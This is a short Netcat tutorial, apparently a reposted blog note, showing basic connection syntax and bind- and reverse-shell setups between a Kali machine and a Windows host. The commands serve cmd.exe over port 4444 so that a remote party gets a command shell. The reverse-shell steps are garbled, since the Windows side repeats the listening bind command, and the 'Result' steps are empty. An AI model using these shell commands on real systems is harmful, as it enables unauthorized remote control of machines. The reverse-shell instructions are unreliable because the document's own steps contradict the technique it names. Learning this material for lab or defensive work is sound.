Introduction to Netcat
Basic usage:
nc -nv IP Port
Bind Shell:
1.On the Windows nc tool.
-nvlp 4444 -e cmd.exe
2. On the Kali nc tool.
nc -nv 10.0.0.16 4444
3.Result
Reverse Shells
1.On the Kali nc tool.
nc -nvlp 4444
2.On the Windows nc tool.
-nvlp 4444 -e cmd.exe
3. Result
原文:https://www.cnblogs.com/keepmoving1113/p/11073628.html